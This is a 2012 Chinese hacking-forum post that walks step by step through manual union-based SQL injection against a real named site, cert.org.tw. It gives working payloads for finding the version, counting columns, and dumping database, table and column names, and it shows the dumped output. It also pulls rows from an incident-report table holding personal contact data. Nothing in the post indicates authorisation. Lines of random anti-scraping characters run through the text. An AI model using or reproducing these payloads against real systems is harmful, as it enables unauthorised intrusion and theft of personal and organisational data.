中国网络渗透测试联盟
标题:
.高级暴库方法讲解
[打印本页]
作者:
admin
时间:
2012-9-13 17:57
标题:
.高级暴库方法讲解
1.判断版本
http://www.cert.org.tw/document/advisory/detail.php?id=7
and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询
1 ^4 i0 ~$ ^0 i5 v8 |6 j
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
& ~5 L8 g$ l! K% @, n& C( Z* j1 P
http://www.cert.org.tw/document/advisory/detail.php?id=7
and 2=4 union select 1,2,3,4,5,6,7,8,9--
9 s. L7 c2 B0 c3 B6 S
3.查看数据库版本及当前用户,
http://www.cert.org.tw/document/advisory/detail.php?id=7
and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
; s. T6 M( j6 c% j1 H+ o1 W+ p
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。
/ y+ o. J6 ^8 f6 m; l
4.判断有没有写权限
: l" h7 N7 P, W. J" U! c0 D* C
http://www.cert.org.tw/document/advisory/detail.php?id=7
and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限
4 Z7 \4 w; b' t4 R- g
没办法,手动猜表啦
0 M. u7 x9 {9 S0 ]! Q9 K8 W; b
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
: D; k0 C4 t( e% I3 g8 ^0 u
但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下
, ~/ U S% Q# I( r
http://www.cert.org.tw/document/ ... union+select+concat
(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
$ s; k5 v- `. e9 W$ [0 h1 j. q
成功查出所有数据库,国外的黑客就是不一般。数据库如下:
& Z9 {1 [7 o9 X6 } K: b. R
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb
7 E P U0 Z3 @
6.爆表,爆的是twcert库
% @0 V$ H$ U3 {% q* F+ q$ v' r
http://www.cert.org.tw/document/ ... union+select+concat
(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
2 E' u" O& F; g C
爆出如下表
. \& x1 J2 o K3 j
downloadfile,irsys,newsdata,secrpt,secrpt_big5
8 I8 C0 }/ l- A" A( e
7.爆列名,这次爆的是irsys表
2 m$ C+ A: n. t( S
http://www.cert.org.tw/document/ ... union+select+concat
(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
) C' X1 S3 ]& |# F( Q* o2 ^. H
爆出如下列
2 S4 F( K% P& ~$ L9 @6 Z
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
) O# c* F! Y2 y! ?1 E( [% R* f8 e8 c
8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
% x& h' x- M" h8 Y6 W6 w
http://www.cert.org.tw/document/ ... union+select+concat
(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
7 H8 n& s+ [8 r7 F
返回是3,说明每个列里有3个地段
4 p1 M/ D9 F9 s
9.爆字段内容
; X$ ^' o9 J4 H, b- o
http://www.cert.org.tw/document/ ... union+select+concat
(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
2 {- v& u# c+ |, L b. k
爆出name列的第一个字段的内容
i( a4 I# u2 V
http://www.cert.org.tw/document/ ... union+select+concat
(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
, W0 p* m6 A5 Q4 Q4 Y, [* S, j3 X
爆出name列的第二个字段的内容
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2